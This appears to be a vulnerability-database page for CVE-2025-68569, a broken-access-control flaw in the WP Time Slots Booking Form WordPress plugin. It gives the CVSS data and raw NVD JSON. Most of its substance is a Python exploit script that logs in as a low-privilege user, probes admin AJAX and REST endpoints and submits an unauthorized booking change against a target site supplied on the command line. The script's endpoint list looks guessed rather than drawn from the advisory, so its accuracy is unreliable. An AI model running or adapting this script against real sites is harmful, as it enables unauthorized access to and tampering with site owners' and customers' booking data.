Security Vulnerability Report
中文
CVE-2025-68569 CVSS 6.5 MEDIUM

CVE-2025-68569

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:32

Description

Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.39.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Time Slots Booking Form <= 1.2.39

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68569 PoC - Missing Authorization in WP Time Slots Booking Form # Target: WordPress site with WP Time Slots Booking Form plugin <= 1.2.39 def exploit_unauthorized_access(target_url, username, password): """ Exploit Missing Authorization vulnerability Low-privilege users can access admin-level functions """ session = requests.Session() # Step 1: Authentication with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as low-privilege user: {username}") resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Access unauthorized admin endpoint # Common vulnerable endpoints in this plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=pts_get_slots', '/wp-admin/admin-ajax.php?action=pts_save_booking', '/wp-json/wp-time-slots/v1/bookings', '/wp-json/wp-time-slots/v1/slots' ] print("[*] Attempting to access unauthorized endpoints...") for endpoint in vulnerable_endpoints: url = target_url + endpoint try: resp = session.get(url, timeout=10) if resp.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Response: {resp.text[:500]}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") # Step 3: Try to modify bookings as low-privilege user modify_url = f"{target_url}/wp-admin/admin-ajax.php" modify_data = { 'action': 'pts_save_booking', 'booking_id': '1', 'slot_id': '999', 'customer_name': 'Attacker', 'customer_email': '[email protected]', 'customer_phone': '1234567890', 'notes': 'Unauthorized modification' } print("[*] Attempting unauthorized booking modification...") resp = session.post(modify_url, data=modify_data) if resp.status_code == 200: print(f"[+] Potential vulnerability confirmed") print(f" Response: {resp.text}") return True if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-68569.py <target_url> <username> <password>") print("Example: python cve-2025-68569.py http://target.com subscriber password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_unauthorized_access(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68569", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:23.833", "lastModified": "2026-04-27T19:16:31.503", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.39."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-time-slots-booking-form/vulnerability/wordpress-wp-time-slots-booking-form-plugin-1-2-38-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}